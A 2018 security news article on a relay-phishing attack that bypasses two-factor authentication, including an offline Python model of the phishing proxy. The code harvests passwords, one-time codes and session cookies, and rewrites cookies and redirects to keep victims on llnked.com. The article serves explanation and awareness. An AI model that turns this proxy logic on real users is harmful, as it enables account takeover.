Hacker beats two-factor authentication with phishing attack

2018-05-10 16:24 by Daniela

Security researcher Kevin Mitnick has demonstrated a social engineering attack that bypasses two-factor authentication. Two-factor authentication (2FA) adds a layer of security by requiring something the user KNOWS and something they HAVE: for instance, a username and password together with a one-time code that is sent to them or generated by an app on their phone.

The attack proxies the victim through the attacker's system. A credential phish sends the user to a typo-squatting domain, and the server behind that domain relays every request to the real site and every response back to the user. Once the user takes the bait and enters their credentials and their 2FA code, both are passed on to the real site, which answers with an authenticated session cookie. That cookie travels back through the attacker's proxy, where it is captured, and using it to get into the account is trivial.

Mitnick produced a video on YouTube showing how the exploit works by sending victims to a fake login page. For the demo, he used a fake LinkedIn page.

The website looks just like the LinkedIn login page, but it is on the llnked.com domain. This is the point at which a suspicious user should stop, but most are simply eager to get onto the site, so they fill in their details and click Sign in. That triggers the 2FA check at the real site; when the right code is entered, the real site issues a session cookie, and because every request and response is flowing through the attacker's proxy, the attacker receives that cookie too.
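The two paragraphs above describe one procedure: the proxy swaps hostnames on the way in, harvests the form fields, and rewrites the real site's cookies and redirects on the way out so the victim stays on the phishing domain. The following offline model is an added example written for this article, not code from Mitnick's demo or from the tool he used. All HTTP messages are constructed for the demo, and the paths, form field names (session_key, session_password, pin) and cookie name (li_at) are assumptions, not LinkedIn's real ones.

```python
"""Offline model of a relay phish: victim -> llnked.com proxy -> real site,
and the real site's session cookie back through the proxy.  No network;
every message is constructed, and all names are illustrative assumptions."""
from urllib.parse import parse_qs

REAL_HOST = "www.linkedin.com"    # genuine site (illustrative)
PHISH_HOST = "llnked.com"         # typo-squatting domain from the article
HARVEST_FIELDS = ("session_key", "session_password", "pin")  # assumed field names


def parse_message(raw: bytes):
    """Split a raw HTTP/1.1 message into (start line, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def serialize(start: str, headers, body: bytes) -> bytes:
    head = "\r\n".join([start] + [f"{n}: {v}" for n, v in headers])
    return head.encode("latin-1") + b"\r\n\r\n" + body


class RelayProxy:
    def __init__(self):
        self.creds = {}    # harvested form fields (password, 2FA code)
        self.cookies = {}  # harvested session cookies

    def to_upstream(self, raw: bytes) -> bytes:
        """Victim -> proxy -> real site: swap hostnames so the real site
        accepts the request, and copy out any interesting form fields."""
        start, headers, body = parse_message(raw)
        fixed = []
        for name, value in headers:
            if name.lower() == "host":
                value = REAL_HOST
            elif name.lower() in ("origin", "referer"):
                value = value.replace(PHISH_HOST, REAL_HOST)
            fixed.append((name, value))
        if start.startswith("POST "):
            fields = parse_qs(body.decode("latin-1"))
            for key in HARVEST_FIELDS:
                if key in fields:
                    self.creds[key] = fields[key][0]
        return serialize(start, fixed, body)

    def to_victim(self, raw: bytes) -> bytes:
        """Real site -> proxy -> victim: capture Set-Cookie, then re-scope
        cookies and redirects so the victim's browser stays on the phish."""
        start, headers, body = parse_message(raw)
        fixed = []
        for name, value in headers:
            if name.lower() == "set-cookie":
                nv, *attrs = [p.strip() for p in value.split(";")]
                cname, _, cval = nv.partition("=")
                self.cookies[cname] = cval  # the prize: the session cookie
                attrs = [a for a in attrs if not a.lower().startswith("domain=")]
                value = "; ".join([nv, f"Domain={PHISH_HOST}"] + attrs)
            elif name.lower() == "location":
                value = value.replace(REAL_HOST, PHISH_HOST)
            fixed.append((name, value))
        return serialize(start, fixed, body)

    def hijack_request(self, path: str = "/feed/") -> bytes:
        """The attacker's later request: no password, no 2FA, just the cookie."""
        cookie = "; ".join(f"{k}={v}" for k, v in self.cookies.items())
        return serialize(f"GET {path} HTTP/1.1",
                         [("Host", REAL_HOST), ("Cookie", cookie)], b"")


# Constructed traffic for the demo (not captured from any real site).
VICTIM_LOGIN = (b"POST /checkpoint/lg/login-submit HTTP/1.1\r\n"
                b"Host: llnked.com\r\nOrigin: https://llnked.com\r\n"
                b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                b"session_key=alice%40example.com&session_password=hunter2")
VICTIM_2FA = (b"POST /checkpoint/challenge/verify HTTP/1.1\r\nHost: llnked.com\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n\r\npin=482913")
SITE_RESPONSE = (b"HTTP/1.1 302 Found\r\nLocation: https://www.linkedin.com/feed/\r\n"
                 b"Set-Cookie: li_at=AQEDARsessiontoken123; Domain=.www.linkedin.com; "
                 b"Path=/; Secure; HttpOnly\r\nContent-Length: 0\r\n\r\n")


def demo():
    """Run the whole exchange and return (proxy, relayed login, rewritten response)."""
    proxy = RelayProxy()
    upstream_login = proxy.to_upstream(VICTIM_LOGIN)
    proxy.to_upstream(VICTIM_2FA)          # the one-time code is relayed, not cracked
    victim_response = proxy.to_victim(SITE_RESPONSE)
    return proxy, upstream_login, victim_response


if __name__ == "__main__":
    p, _, _ = demo()
    print("harvested:", p.creds, p.cookies)
    print(p.hijack_request().decode())
```

Nothing in this flow inspects the one-time code; it is forwarded within its validity window exactly as the user typed it. The only value the user controls that the proxy cannot rewrite is the hostname in the browser's address bar, which is why the article calls the user the weak link.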

What Mitnick is showing is that even with 2FA, the user is the weak link. The one-time code is not cracked; it is relayed to the real site while it is still valid, so the strength of the second factor makes no difference. If users don't take the time to check where they are entering their credentials, no security control that depends on the user, however strong, is going to work.

"A white hat hacker friend of Kevin's developed a tool to bypass two-factor authentication using social engineering tactics – and it can be weaponized for any site," said Stu Sjouwerman, CEO, KnowBe4. "Two-factor authentication is intended to be an extra layer of security, but in this instance, we clearly see that you can't rely on it alone to protect your organization. This highlights the need for new-school security awareness training and simulated phishing because people are truly your last line of defense."